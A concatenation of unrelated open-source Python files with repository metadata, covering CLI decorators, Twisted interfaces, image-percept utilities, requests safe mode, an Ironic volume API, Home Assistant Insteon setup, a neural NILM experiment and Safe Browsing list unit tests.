"source": "github",
"line_count": 8,
"max_line_length": 65,
"avg_line_length": 20.25,
"alnum_prop": 0.8333333333333334,
"repo_name": "diogocs1/comps",
"id": "becd17f0b78d73aa89c3c61d76317867c9e9a1c7",
"size": "1141",
"binary": false,
"copies": "428",
"ref": "refs/heads/master",
"path": "web/addons/project/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "701"
},
{
"name": "CSS",
"bytes": "856533"
},
{
"name": "HTML",
"bytes": "299671"
},
{
"name": "Java",
"bytes": "620166"
},
{
"name": "JavaScript",
"bytes": "5844302"
},
{
"name": "Makefile",
"bytes": "21002"
},
{
"name": "PHP",
"bytes": "14259"
},
{
"name": "Python",
"bytes": "10647376"
},
{
"name": "Ruby",
"bytes": "220"
},
{
"name": "Shell",
"bytes": "17746"
},
{
"name": "XSLT",
"bytes": "120278"
}
],
"symlink_target": ""
}
|
"""Decorators for Click commands"""
import asyncio
from functools import wraps
import click
from planet import exceptions
# https://github.com/pallets/click/issues/85#issuecomment-503464628
def coro(func):
"""Wrap async functions so they can be run sync with Click.
Parameters:
func: a Click command function or wrapper around one.
Returns:
wrapper function
"""
@wraps(func)
def wrapper(*args, **kwargs):
return asyncio.run(func(*args, **kwargs))
return wrapper
def translate_exceptions(func):
"""Translate internal exceptions to ClickException.
Parameters:
func: a Click command function or wrapper around one.
Returns:
wrapper function
Raises:
ClickException
"""
@wraps(func)
def wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
except exceptions.AuthException:
raise click.ClickException(
'Auth information does not exist or is corrupted. Initialize '
'with `planet auth init`.')
except exceptions.PlanetError as ex:
raise click.ClickException(ex)
return wrapper
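# Hedged illustration, not part of the original module: a hypothetical Click
# command showing the intended decorator order.  `coro` sits closest to the
# coroutine so the callable Click invokes is synchronous, and
# `translate_exceptions` wraps that synchronous call so a PlanetError surfaces
# as a ClickException.
@click.command()
@click.argument('item_id')
@translate_exceptions
@coro
async def _example_get(item_id):
    """Hypothetical command body; a real command would call the Planet SDK."""
    click.echo('would fetch ' + item_id)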
|
{
"content_hash": "26133e6a9502b58a14ad8570ffada70b",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 78,
"avg_line_length": 22.78846153846154,
"alnum_prop": 0.640506329113924,
"repo_name": "planetlabs/planet-client-python",
"id": "f25cadc89818116108b434977bbcadce524bc231",
"size": "1764",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "planet/cli/cmds.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "373344"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
}
|
"""Interface definitions for working with raw packets"""
from twisted.internet import protocol
from zope.interface import Interface
class IRawDatagramProtocol(Interface):
"""An interface for protocols such as UDP, ICMP and TCP."""
def addProto():
"""
Add a protocol on top of this one.
"""
def datagramReceived():
"""
An IP datagram has been received. Parse and process it.
"""
class IRawPacketProtocol(Interface):
"""An interface for low-level protocols such as IP and ARP."""
def addProto():
"""
Add a protocol on top of this one.
"""
def datagramReceived():
"""
An IP datagram has been received. Parse and process it.
"""
|
{
"content_hash": "1d936fae519e085b24a2f35d59636408",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 66,
"avg_line_length": 25.066666666666666,
"alnum_prop": 0.6143617021276596,
"repo_name": "nlloyd/SubliminalCollaborator",
"id": "0d3875bae3ca84cdf2c89f4eece8ed181d462e93",
"size": "828",
"binary": false,
"copies": "35",
"ref": "refs/heads/master",
"path": "libs/twisted/pair/raw.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "510300"
},
{
"name": "Puppet",
"bytes": "6275"
},
{
"name": "Python",
"bytes": "10991491"
},
{
"name": "Shell",
"bytes": "2433"
}
],
"symlink_target": ""
}
|
""" Various utilities for dealing with percept data """
from rigor.s3 import DefaultS3Client
from rigor.types import Percept
try:
import cv2
import numpy as np
_kImageReadFlags = cv2.CV_LOAD_IMAGE_UNCHANGED
except ImportError:
pass
from urlparse import urlsplit
import urllib2
import contextlib
import os
class PerceptOps(object):
"""
Various utilities for dealing with percept data
:param config: configuration data
:type config: :py:class:`~rigor.config.RigorConfiguration`
"""
def __init__(self, config):
self._config = config
def fetch(self, percept):
"""
Given a percept, this will fetch its data from the repository, returning it as an open file-like object with a :py:func:`contextlib.closing` wrapper
:param dict percept: percept metadata
:return: percept data
:rtype: file
"""
return self.read(percept.locator, percept.credentials)
def read(self, url, credentials=None):
"""
Reads data from the specified URL, returning it as an open file-like object with a :py:func:`contextlib.closing` wrapper
:param str url: URL containing data
:param str credentials: optional name of configuration section with S3 credentials
"""
parsed = urlsplit(url)
if not parsed.netloc:
return open(parsed.path, 'rb')
if parsed.scheme == 's3':
s3 = DefaultS3Client(self._config, parsed.netloc, credentials)
data = s3.get(parsed.path)
else:
data = urllib2.urlopen(url)
if data is None:
return None
return contextlib.closing(data)
def remove(self, url, credentials=None):
"""
Removes percept data at the given path. Does not make any changes to the database; this is generally meant to be used by the :py:meth:`destroy` method, though it is available for other purposes.
:param str url: URL for the location of the percept
:param str credentials: optional name of configuration section with S3 credentials
.. todo::
Currently, only local and S3 files are supported.
"""
parsed = urlsplit(url)
if not parsed.netloc:
# Local file
os.unlink(parsed.path)
elif parsed.scheme == 's3':
s3 = DefaultS3Client(self._config, parsed.netloc, credentials)
s3.delete(parsed.path)
else:
raise NotImplementedError("Files not in a local repository or S3 bucket can't be deleted")
def destroy(self, percept, session):
"""
Removes a percept from the database, and its data from the repository.
:param percept: either a :py:class:`~rigor.types.Percept` object, or an integer identifier
:param session: database session
"""
if not hasattr(percept, 'id'):
percept = session.query(Percept).get(percept)
session.delete(percept)
self.remove(percept.locator, percept.credentials)
class ImageOps(PerceptOps):
"""
Utilities for dealing with image-type percepts
:param config: configuration data
:type config: :py:class:`~rigor.config.RigorConfiguration`
"""
def __init__(self, config):
super(ImageOps, self).__init__(config)
def fetch(self, percept):
"""
Given a percept, this will fetch its data from the URL or repository base,
returning it as a NumPy array
:param dict percept: Percept metadata
:return: decoded bitmap
:rtype: :py:class:`numpy.ndarray`
"""
with super(ImageOps, self).fetch(percept) as image_data:
return ImageOps.decode(image_data)
@staticmethod
def decode(percept_data):
"""
Given an image, this will decode it and return it as a NumPy array.
:param percept_data: image data or path to image file
:type percept_data: either a file-like object, or a path to an image file
:return: decoded bitmap
:rtype: :py:class:`numpy.ndarray`
"""
if hasattr(percept_data, 'read'):
image_array = np.frombuffer(percept_data.read(), np.uint8)
return cv2.imdecode(image_array, _kImageReadFlags)
return cv2.imread(percept_data, _kImageReadFlags)
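def _example_fetch(config, percept):
    """Hedged usage sketch, not part of the original module.

    ``config`` is assumed to be a rigor.config.RigorConfiguration and
    ``percept`` a rigor.types.Percept whose ``locator`` points at an image;
    nothing here is invented beyond wiring together the classes above.
    """
    ops = ImageOps(config)
    image = ops.fetch(percept)  # decoded bitmap as a numpy.ndarray
    return image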
|
{
"content_hash": "7ff464999dfd0b708f825d73449a58b4",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 196,
"avg_line_length": 29.95275590551181,
"alnum_prop": 0.7268664563617245,
"repo_name": "blindsightcorp/rigor",
"id": "0d62d858fa1255623a09b5289c0e5e8d53e5185b",
"size": "3804",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/perceptops.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Mako",
"bytes": "494"
},
{
"name": "PHP",
"bytes": "1109"
},
{
"name": "Python",
"bytes": "132419"
}
],
"symlink_target": ""
}
|
"""
requests.safe_mode
~~~~~~~~~~~~
This module contains a decorator that implements safe_mode.
:copyright: (c) 2012 by Kenneth Reitz.
:license: ISC, see LICENSE for more details.
"""
from .models import Response
from .packages.urllib3.response import HTTPResponse
from .exceptions import RequestException, ConnectionError, HTTPError
import socket
def catch_exceptions_if_in_safe_mode(function):
"""New implementation of safe_mode. We catch all exceptions at the API level
and then return a blank Response object with the error field filled. This decorator
wraps request() in api.py.
"""
def wrapped(method, url, **kwargs):
# if save_mode, we catch exceptions and fill error field
if (kwargs.get('config') and kwargs.get('config').get('safe_mode')) or (kwargs.get('session')
and kwargs.get('session').config.get('safe_mode')):
try:
return function(method, url, **kwargs)
except (RequestException, ConnectionError, HTTPError,
socket.timeout, socket.gaierror) as e:
r = Response()
r.error = e
r.raw = HTTPResponse() # otherwise, tests fail
r.status_code = 0 # with this status_code, content returns None
return r
return function(method, url, **kwargs)
return wrapped
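# Hedged sketch, not part of the original module: what the decorator does when
# safe_mode is enabled.  `_boom` is a stand-in for the request() function in
# api.py; the wrapped call returns a blank Response carrying the error instead
# of raising.
def _example_safe_mode():
    @catch_exceptions_if_in_safe_mode
    def _boom(method, url, **kwargs):
        raise ConnectionError('simulated failure')
    r = _boom('GET', 'http://example.invalid', config={'safe_mode': True})
    return r.status_code, r.error  # (0, ConnectionError('simulated failure'))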
|
{
"content_hash": "540d20e724090a06c613279a7a3d91d6",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 101,
"avg_line_length": 37,
"alnum_prop": 0.6251778093883357,
"repo_name": "splunk/splunk-webframework",
"id": "0fb8d7052adcb894d940db7874e633ed934dfcdb",
"size": "1431",
"binary": false,
"copies": "65",
"ref": "refs/heads/master",
"path": "contrib/requests/requests/safe_mode.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1808"
},
{
"name": "CSS",
"bytes": "122646"
},
{
"name": "HTML",
"bytes": "113362"
},
{
"name": "JavaScript",
"bytes": "5135595"
},
{
"name": "Python",
"bytes": "6298367"
},
{
"name": "Shell",
"bytes": "1368"
}
],
"symlink_target": ""
}
|
from oslo_log import log as logging
import pecan
from pecan import rest
from six.moves import http_client
import wsme
from ironic.api.controllers import base
from ironic.api.controllers import link
from ironic.api.controllers.v1 import utils as api_utils
from ironic.api.controllers.v1 import volume_connector
from ironic.api.controllers.v1 import volume_target
from ironic.api import expose
from ironic.common import exception
from ironic.common import policy
LOG = logging.getLogger(__name__)
class Volume(base.APIBase):
"""API representation of a volume root.
This class exists as a root class for the volume connectors and volume
targets controllers.
"""
links = wsme.wsattr([link.Link], readonly=True)
"""A list containing a self link and associated volume links"""
connectors = wsme.wsattr([link.Link], readonly=True)
"""Links to the volume connectors resource"""
targets = wsme.wsattr([link.Link], readonly=True)
"""Links to the volume targets resource"""
@staticmethod
def convert(node_ident=None):
url = pecan.request.public_url
volume = Volume()
if node_ident:
resource = 'nodes'
args = '%s/volume/' % node_ident
else:
resource = 'volume'
args = ''
volume.links = [
link.Link.make_link('self', url, resource, args),
link.Link.make_link('bookmark', url, resource, args,
bookmark=True)]
volume.connectors = [
link.Link.make_link('self', url, resource, args + 'connectors'),
link.Link.make_link('bookmark', url, resource, args + 'connectors',
bookmark=True)]
volume.targets = [
link.Link.make_link('self', url, resource, args + 'targets'),
link.Link.make_link('bookmark', url, resource, args + 'targets',
bookmark=True)]
return volume
class VolumeController(rest.RestController):
"""REST controller for volume root"""
_custom_actions = {
'attach': ['POST'],
'detach': ['DELETE'],
}
_subcontroller_map = {
'connectors': volume_connector.VolumeConnectorsController,
'targets': volume_target.VolumeTargetsController
}
def __init__(self, node_ident=None):
super(VolumeController, self).__init__()
self.parent_node_ident = node_ident
@expose.expose(Volume)
def get(self):
if not api_utils.allow_volume():
raise exception.NotFound()
cdict = pecan.request.context.to_policy_values()
policy.authorize('baremetal:volume:get', cdict, cdict)
return Volume.convert(self.parent_node_ident)
@expose.expose(Volume)
def attach(self, volume_id, connector_uuid, node_id=None):
cdict = pecan.request.context.to_policy_values()
policy.authorize('baremetal:volume:attach_volume', cdict, cdict)
        rpc_node = api_utils.get_rpc_node(node_id)
topic = pecan.request.rpcapi.get_topic_for(rpc_node)
return pecan.request.rpcapi.attach_volume(pecan.request.context,
volume_id,
connector_uuid,
node_id,
topic)
@expose.expose(Volume)
def detach(self, volume_id, node_id=None):
cdict = pecan.request.context.to_policy_values()
policy.authorize('baremetal:volume:detach_volume', cdict, cdict)
        rpc_node = api_utils.get_rpc_node(node_id)
topic = pecan.request.rpcapi.get_topic_for(rpc_node)
return pecan.request.rpcapi.detach_volume(pecan.request.context,
volume_id,
node_id)
@pecan.expose()
def _lookup(self, subres, *remainder):
if not api_utils.allow_volume():
pecan.abort(http_client.NOT_FOUND)
subcontroller = self._subcontroller_map.get(subres)
if subcontroller:
return subcontroller(node_ident=self.parent_node_ident), remainder
|
{
"content_hash": "43c75cdbf0918a2675ba4682af10bbc4",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 79,
"avg_line_length": 35.049586776859506,
"alnum_prop": 0.5963216222589012,
"repo_name": "ruyang/ironic",
"id": "9b2eb8447fa30e10bdeafe2980f2d0aa65b7fae8",
"size": "4851",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ironic/api/controllers/v1/volume.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "349"
},
{
"name": "Python",
"bytes": "5133461"
},
{
"name": "Shell",
"bytes": "107097"
}
],
"symlink_target": ""
}
|
"""Support for INSTEON Modems (PLM and Hub)."""
import asyncio
import logging
from pyinsteon import async_close, async_connect, devices
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.const import CONF_PLATFORM, EVENT_HOMEASSISTANT_STOP
from homeassistant.data_entry_flow import RESULT_TYPE_CREATE_ENTRY
from homeassistant.exceptions import ConfigEntryNotReady
from .const import (
CONF_CAT,
CONF_DIM_STEPS,
CONF_HOUSECODE,
CONF_OVERRIDE,
CONF_SUBCAT,
CONF_UNITCODE,
CONF_X10,
DOMAIN,
INSTEON_COMPONENTS,
ON_OFF_EVENTS,
)
from .schemas import convert_yaml_to_config_flow
from .utils import (
add_on_off_event_device,
async_register_services,
get_device_platforms,
register_new_device_callback,
)
_LOGGER = logging.getLogger(__name__)
async def async_id_unknown_devices(config_dir):
"""Send device ID commands to all unidentified devices."""
await devices.async_load(id_devices=1)
for addr in devices:
device = devices[addr]
flags = True
for name in device.operating_flags:
if not device.operating_flags[name].is_loaded:
flags = False
break
if flags:
for name in device.properties:
if not device.properties[name].is_loaded:
flags = False
break
# Cannot be done concurrently due to issues with the underlying protocol.
if not device.aldb.is_loaded or not flags:
await device.async_read_config()
await devices.async_save(workdir=config_dir)
async def async_setup_platforms(hass, config_entry):
"""Initiate the connection and services."""
tasks = [
hass.config_entries.async_forward_entry_setup(config_entry, component)
for component in INSTEON_COMPONENTS
]
await asyncio.gather(*tasks)
for address in devices:
device = devices[address]
platforms = get_device_platforms(device)
if ON_OFF_EVENTS in platforms:
add_on_off_event_device(hass, device)
_LOGGER.debug("Insteon device count: %s", len(devices))
register_new_device_callback(hass)
async_register_services(hass)
device_registry = await hass.helpers.device_registry.async_get_registry()
device_registry.async_get_or_create(
config_entry_id=config_entry.entry_id,
identifiers={(DOMAIN, str(devices.modem.address))},
manufacturer="Smart Home",
name=f"{devices.modem.description} {devices.modem.address}",
model=f"{devices.modem.model} (0x{devices.modem.cat:02x}, 0x{devices.modem.subcat:02x})",
sw_version=f"{devices.modem.firmware:02x} Engine Version: {devices.modem.engine_version}",
)
# Make a copy of addresses due to edge case where the list of devices could change during status update
# Cannot be done concurrently due to issues with the underlying protocol.
for address in list(devices):
try:
await devices[address].async_status()
except AttributeError:
pass
await async_id_unknown_devices(hass.config.config_dir)
async def close_insteon_connection(*args):
"""Close the Insteon connection."""
await async_close()
async def async_import_config(hass, conf):
"""Set up all of the config imported from yaml."""
data, options = convert_yaml_to_config_flow(conf)
# Create a config entry with the connection data
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_IMPORT}, data=data
)
# If this is the first time we ran, update the config options
if result["type"] == RESULT_TYPE_CREATE_ENTRY and options:
entry = result["result"]
hass.config_entries.async_update_entry(
entry=entry, options=options,
)
return result
async def async_setup(hass, config):
"""Set up the Insteon platform."""
if DOMAIN not in config:
return True
conf = config[DOMAIN]
hass.async_create_task(async_import_config(hass, conf))
return True
async def async_setup_entry(hass, entry):
"""Set up an Insteon entry."""
if not devices.modem:
try:
await async_connect(**entry.data)
except ConnectionError as exception:
_LOGGER.error("Could not connect to Insteon modem")
raise ConfigEntryNotReady from exception
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, close_insteon_connection)
await devices.async_load(
workdir=hass.config.config_dir, id_devices=0, load_modem_aldb=0
)
for device_override in entry.options.get(CONF_OVERRIDE, []):
# Override the device default capabilities for a specific address
address = device_override.get("address")
if not devices.get(address):
cat = device_override[CONF_CAT]
subcat = device_override[CONF_SUBCAT]
devices.set_id(address, cat, subcat, 0)
for device in entry.options.get(CONF_X10, []):
housecode = device.get(CONF_HOUSECODE)
unitcode = device.get(CONF_UNITCODE)
x10_type = "on_off"
steps = device.get(CONF_DIM_STEPS, 22)
if device.get(CONF_PLATFORM) == "light":
x10_type = "dimmable"
elif device.get(CONF_PLATFORM) == "binary_sensor":
x10_type = "sensor"
_LOGGER.debug(
"Adding X10 device to Insteon: %s %d %s", housecode, unitcode, x10_type
)
device = devices.add_x10_device(housecode, unitcode, x10_type, steps)
asyncio.create_task(async_setup_platforms(hass, entry))
return True
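# Hedged illustration, not part of the original integration: the shape of the
# X10 entries consumed by async_setup_entry above.  The housecode/unitcode
# values below are placeholders, not taken from any real configuration.
_EXAMPLE_X10_OPTIONS = [
    {
        CONF_HOUSECODE: "a",
        CONF_UNITCODE: 1,
        CONF_PLATFORM: "light",  # mapped to the "dimmable" X10 type above
        CONF_DIM_STEPS: 22,
    }
]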
|
{
"content_hash": "648bef4c22881c15ce5cd27f5d2763f6",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 107,
"avg_line_length": 34.102409638554214,
"alnum_prop": 0.6587175410704822,
"repo_name": "titilambert/home-assistant",
"id": "62032b681b83099d1e27b42133cabcd774995d2f",
"size": "5661",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/insteon/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1488"
},
{
"name": "Python",
"bytes": "25849092"
},
{
"name": "Shell",
"bytes": "4410"
}
],
"symlink_target": ""
}
|
from __future__ import print_function, division
from neuralnilm import Net, RealApplianceSource, BLSTMLayer, SubsampleLayer, DimshuffleLayer
from lasagne.nonlinearities import sigmoid, rectify
from lasagne.objectives import crossentropy
from lasagne.init import Uniform, Normal
from lasagne.layers import LSTMLayer, DenseLayer, Conv1DLayer, ReshapeLayer
from lasagne.updates import adagrad, nesterov_momentum
from functools import partial
"""
Setup:
* in_to_cell init weights are now Normal(1.0)
* output all appliances
* fix bug in RealApplianceSource
* use cross-entropy
* smaller network
* power targets
* trying without first two sigmoid layers.
* updated to craffel/nntools commit 097aca480d60fdfada513c20070f8132d71a26b0
which fixes LSTM bug.
https://github.com/craffel/nntools/commit/097aca480d60fdfada513c20070f8132d71a26b0
* Subsampling *bidirectional* LSTM
* Output every sequence in the batch
* Change W_in_to_cell from Normal(1.0) to Uniform(5)
* put back the two sigmoid layers
* use Conv1D to create a hierarchical subsampling LSTM
* Using LSTM (not BLSTM) to speed up training while testing
* Use dimshuffle not reshape
* 2 dense layers back
* back to default init
* conv between LSTMs.
* More data
* BLSTM
* Try just using a 1D convnet on input
* add second Convnet layer (not sure this is correct thing to do?)
* third conv layer
* large inits
* back to 2 conv layers
e70
* Based on e65
* Using sigmoid instead of rectify in Conv1D layers
e71
* Larger layers
* More data
e72
* At a third conv layer
e73
* Add a dense layer after 3 conv layers
e74
* Removed dense layer after 3 conv layers (because it failed to learn anything)
* Trying standard inits for weights and biases throughout network.
e75
* Putting back large init for first layer
e76
* Removed 3rd conv layer
e77
* Try init Uniform(1)
e78
* Back to large inits for first layers
* Trying 3rd conv layer, also with large init
e79
* Trying to merge 1D conv on bottom layer with hierarchical subsampling
from e59a.
* Replace first LSTM with BLSTM
* Add second BLSTM layer
* Add conv1d between BLSTM layers.
e80
* Remove third 1d conv layer
e81
* Change num_filters in conv layer between BLSTMs from 20 to 80
e83
* Same net as e81
* Using different appliances, longer seq, and validation on house 5
(unseen during training!) Might be unfair because, for example,
house 1 doesn't use its washer dryer in drying mode ever but it
house 5 does.
* Using a seq_length of 4000 resulted in NaNs very quickly.
Dropping to 2000 resulted in NaNs after 100 epochs
1000 resulted in Nans after 4500 epochs
e83b
* Back to seq_length of 2000, modified net.py so it called IPDB
if train error is NaN or > 1
e83c
* Changed inits to standard values to try to stop NaN train costs
Results: I let it run for a little over 100 epochs. No Nans. But
wasn't learning anything very sane.
e83d
* Uniform(1)
e83e
* Try adagrad
e84
* Trying to find minimial example which gets NaNs
RESULT: Blows up after 19 epochs! Yay!
e85
* Try adagrad
RESULTS at different learning rates:
* 1 goes to NaN within 2 epochs ;(
* 0.01 went to NaN in 13 epochs
* 0.0001 doesn't go to NaN after 1000 epochs and may even be starting to learning something!
* 0.001 (e)85b doesn't go to NaN about >140 epochs
e86
* Trying larger network again (with adagrad with learning rate 0.001)
* Doesn't go to NaN (after >770 epochs) and learns something very vaguely useful
but not great. At all. Doesn't discriminate between appliances.
e87
* Network like e82. Just LSTM -> Conv -> LSTM -> Dense.
* More data
e88
* Train and validate just on house 1
e89
* try nesterov_momentum but with learning rate 0.01
Results
"""
source = RealApplianceSource(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
'kettle',
'dish washer',
['washer dryer', 'washing machine'],
'microwave'
],
max_appliance_powers=[300, 3000, 2500, 2400, 2000],
on_power_thresholds=[80, 200, 20, 600, 100],
min_on_durations=[60, 10, 300, 300, 10],
window=("2013-05-22", "2015-01-01"),
seq_length=2000,
output_one_appliance=False,
boolean_targets=False,
min_off_duration=60,
subsample_target=5,
train_buildings=[1],
validation_buildings=[1]
)
net = Net(
experiment_name="e89",
source=source,
save_plot_interval=50,
loss_function=crossentropy,
updates=partial(nesterov_momentum, learning_rate=0.001),
layers_config=[
{
'type': LSTMLayer, # TODO change to BLSTM
'num_units': 60,
'W_in_to_cell': Uniform(5)
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1)
},
{
'type': Conv1DLayer,
'num_filters': 80,
'filter_length': 5,
'stride': 5,
'nonlinearity': sigmoid
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1)
},
{
'type': LSTMLayer,
'num_units': 80,
'W_in_to_cell': Uniform(5)
},
{
'type': DenseLayer,
'num_units': source.n_outputs,
'nonlinearity': sigmoid
}
]
)
net.print_net()
net.compile()
net.fit()
|
{
"content_hash": "75b62fa9cbc34f911a9b9b8bd38d433c",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 92,
"avg_line_length": 26.211822660098523,
"alnum_prop": 0.6829543318925014,
"repo_name": "JackKelly/neuralnilm_prototype",
"id": "e1228d814516634df28f1c16361f91e89a66a438",
"size": "5321",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "scripts/e89.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4536723"
}
],
"symlink_target": ""
}
|
"""Unittest for googlesafebrowsing.sblist."""
import sblist
import server
import util
import unittest
class ListTest(unittest.TestCase):
def assertSameElements(self, a, b):
a = sorted(list(a))
b = sorted(list(b))
self.assertEqual(a, b, 'Expected: [%s], Found: [%s]' %
(', '.join(map(str, a)), ', '.join(map(str, b))))
def setUp(self):
self._list = sblist.List('goog-malware-shavar')
self._list.AddPrefix('aprefix', 1)
self._list.AddPrefix('bprefix', 2)
self._list.AddPrefix('aprefix', 3)
self._list.AddPrefix('cprefix', 1)
self._list.AddPrefix('0000', 4)
self.assertTrue(self._list.AddFullHash('0000fullhash', 4, 10))
self._list.AddPrefix('dprefix', 5)
self._list.AddEmptyAddChunk(5) # should remove dprefix
self._list.AddPrefix('eprefix', 6)
self._list.AddPrefix('fprefix', 6)
# After this add chunk 6 should still be around
self.assertTrue(self._list.RemovePrefix('eprefix', 1, 6))
self._list.AddPrefix('gprefix', 7)
self._list.AddPrefix('hprefix', 8)
self.assertTrue(self._list.RemovePrefix('gprefix', 2, 7))
self.assertTrue(self._list.RemovePrefix('hprefix', 2, 8))
# Subs for adds we have not yet received.
self.assertFalse(self._list.RemovePrefix('iprefix', 2, 11))
self.assertFalse(self._list.RemovePrefix('jprefix', 2, 12))
# Test prefix matching
self._list.AddPrefix('prefixaa', 9)
self._list.AddPrefix('prefixab', 9)
self._list.AddPrefix('prefixaa', 10)
self._list.AddEmptySubChunk(3)
# Add some empty sub chunks to see that we would support fragmentation.
self._list.AddEmptySubChunk(5)
self._list.AddEmptySubChunk(6)
self._list.AddEmptySubChunk(7)
def testGetRangeStr(self):
sbl = sblist.List('foo')
s = sbl._GetRangeStr([1, 2, 3, 4])
self.assertEqual(s, '1-4')
s = sbl._GetRangeStr([1, 2, 4, 5, 7, 8, 9, 10, 11, 13, 15, 17])
self.assertEqual(s, '1-2,4-5,7-11,13,15,17')
s = sbl._GetRangeStr([1])
self.assertEqual(s, '1')
def testName(self):
self.assertEqual('goog-malware-shavar', self._list.Name())
def testGetSetUpdateTime(self):
self.assertEqual(None, self._list.UpdateTime())
self._list.SetUpdateTime(42)
self.assertEqual(42, self._list.UpdateTime())
  def testAddChunkMap(self):
self.assertSameElements([1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
self._list.AddChunkMap())
self.assertSameElements(['aprefix', 'cprefix'],
self._list.AddChunkMap()[1])
self.assertSameElements(['bprefix',], self._list.AddChunkMap()[2])
self.assertSameElements(['aprefix',], self._list.AddChunkMap()[3])
self.assertSameElements(['0000',], self._list.AddChunkMap()[4])
self.assertSameElements([], self._list.AddChunkMap()[5])
self.assertSameElements(['fprefix',], self._list.AddChunkMap()[6])
self.assertSameElements([], self._list.AddChunkMap()[7])
self.assertSameElements([], self._list.AddChunkMap()[8])
self.assertSameElements(['prefixaa', 'prefixab'],
self._list.AddChunkMap()[9])
self.assertSameElements(['prefixaa'], self._list.AddChunkMap()[10])
def testSubChunkMap(self):
self.assertSameElements([1, 2, 3, 5, 6, 7],
self._list.SubChunkMap())
self.assertEqual(0, len(self._list.SubChunkMap()[1]))
self.assertSameElements([sblist.SubEntry('iprefix', 2, 11),
sblist.SubEntry('jprefix', 2, 12)],
self._list.SubChunkMap()[2])
self.assertSameElements([], self._list.SubChunkMap()[3])
self.assertSameElements([], self._list.SubChunkMap()[5])
self.assertSameElements([], self._list.SubChunkMap()[6])
self.assertSameElements([], self._list.SubChunkMap()[7])
def testNumPrefixes(self):
self.assertEqual(9, self._list.NumPrefixes())
def testGotAddChunk(self):
for i in [1, 2, 3, 4, 5, 6, 7]:
self.assertTrue(self._list.GotAddChunk(i))
self.assertFalse(self._list.GotAddChunk(100))
def testGotSubChunk(self):
for i in [1, 2, 3, 5, 6, 7]:
self.assertTrue(self._list.GotSubChunk(i))
self.assertFalse(self._list.GotSubChunk(4))
def testAddFullHash(self):
# The prefix must be present in the list.
self.assertFalse(self._list.AddFullHash('noprefix', 4, 10))
self.assertTrue(self._list.AddFullHash('0000full', 4, 42))
entry = sblist.AddEntry('0000', 4, '0000full')
self.assertSameElements([entry], self._list.GetPrefixMatches('0000'))
def testAddPrefix(self):
# This should return false because this add chunk is already subbed.
self.assertFalse(self._list.AddPrefix('iprefix', 11))
# Test adding a prefix to a new chunk.
self.assertTrue(self._list.AddPrefix('asdf', 10))
entry = sblist.AddEntry('asdf', 10)
self.assertSameElements([entry], self._list.GetPrefixMatches('asdfasdf'))
self.assertSameElements([entry], self._list.GetPrefixMatches('asdf'))
# Test adding a prefix to an existing chunk.
self.assertTrue(self._list.AddPrefix('asdfasdf', 3))
other_entry = sblist.AddEntry('asdfasdf', 3)
self.assertSameElements([entry, other_entry],
self._list.GetPrefixMatches('asdfasdf'))
# Check to see if it supports full hashes correctly.
fullhash = util.GetHash256('asdf')
self.assertTrue(self._list.AddPrefix(fullhash, 11))
self.assertEqual(1, len(list(self._list.GetPrefixMatches(fullhash))))
def testRemovePrefix(self):
# Can't remove non existent prefix.
self.assertFalse(self._list.RemovePrefix('some_prefix', 8, 1))
# Remove first of two prefixes.
self.assertTrue(self._list.RemovePrefix('aprefix', 8, 1))
entry = sblist.AddEntry('aprefix', 3)
self.assertSameElements([entry], self._list.GetPrefixMatches('aprefix'))
# Remove second prefix.
self.assertTrue(self._list.RemovePrefix('aprefix', 8, 3))
self.assertSameElements([], self._list.GetPrefixMatches('aprefix'))
def testDeleteAddChunk(self):
# Delete add chunk that does not exist.
self.assertFalse(self._list.DeleteAddChunk(11))
# Delete empty add chunk
self.assertTrue(self._list.DeleteAddChunk(5))
self.assertFalse(self._list.GotAddChunk(5))
self.assertSameElements([], self._list.GetPrefixMatches('dprefix'))
# Delete normal add chunk
self.assertTrue(self._list.DeleteAddChunk(1))
self.assertFalse(self._list.GotAddChunk(1))
entry = sblist.AddEntry('aprefix', 3)
self.assertSameElements([entry], self._list.GetPrefixMatches('aprefix'))
self.assertSameElements([], self._list.GetPrefixMatches('cprefix'))
def testDeleteSubChunk(self):
# Delete sub chunk that does not exist.
self.assertFalse(self._list.DeleteSubChunk(8))
# Delete empty sub chunk.
self.assertTrue(self._list.DeleteSubChunk(7))
self.assertFalse(self._list.GotSubChunk(7))
# Delete non-empty sub chunk
self.assertTrue(self._list.DeleteSubChunk(2))
self.assertFalse(self._list.GotSubChunk(2))
def testDownloadRequest(self):
self.assertEqual('goog-malware-shavar;a:1-10:s:1-3,5-7',
self._list.DownloadRequest(False))
self.assertEqual('goog-malware-shavar;a:1-10:s:1-3,5-7:mac',
self._list.DownloadRequest(True))
